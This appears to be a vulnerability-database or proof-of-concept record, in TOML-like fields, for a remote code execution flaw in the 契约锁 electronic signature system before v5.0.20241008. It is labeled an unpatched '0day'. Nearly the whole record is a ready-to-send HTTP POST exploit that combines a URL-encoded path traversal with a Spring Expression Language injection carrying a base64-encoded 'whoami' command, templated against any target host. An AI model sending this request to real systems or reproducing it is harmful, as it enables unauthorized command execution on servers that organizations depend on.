vendor = "契约锁"
name = "契约锁电子签章系统远程代码执行漏洞"
type = "RCE"
version = "契约锁<v5.0.20241008"
path = "/pdfverifier/%2e%2e/template/html/add"
detail = "POST /pdfverifier/%2e%2e/template/html/add HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Content-Type: application/json { \"file\": \"1\", \"title\": \"2\", \"params\": { \"extensionParam\": \"{\\\"expression\\\":\\\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='d2hvYW1p';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'];c.getValue();\\\"}\", \"name\": \"test\" } }"
fix = "未知"
date = "0702"
label = "0day"
verifier = "AdySec"
